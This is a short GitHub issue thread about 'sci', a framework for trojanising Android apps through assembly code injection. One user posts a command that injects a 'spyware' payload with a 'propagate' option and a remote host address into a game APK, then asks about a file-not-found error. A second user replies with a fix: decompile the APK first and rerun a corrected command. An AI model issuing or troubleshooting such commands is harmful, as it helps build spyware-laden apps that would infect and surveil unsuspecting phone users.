aress31 / sci

Framework designed to automate the process of assembly code injection (trojanising) within Android applications.
Apache License 2.0
36 stars 13 forks source link

error #3

Open pretech86 opened 4 years ago

pretech86 commented 4 years ago

i used this command python3 sci.py -a /root/Desktop/flappy.apk payload spyware -ppg propagate -rh 192.168.8.123 and it give the following error FileNotFoundError: [Errno 2] No such file or directory: '../tmp/classes.dex'

can you help me please

Morsmalleo commented 2 years ago

i used this command python3 sci.py -a /root/Desktop/flappy.apk payload spyware -ppg propagate -rh 192.168.8.123 and it give the following error FileNotFoundError: [Errno 2] No such file or directory: '../tmp/classes.dex'

can you help me please

Try Decompiling the flappy.apk first then run your command again like this

python3 sci.py -a /root/Desktop/flappy payload spyware -ppg propagate -rh 192.168.8.123

Maybe that might work.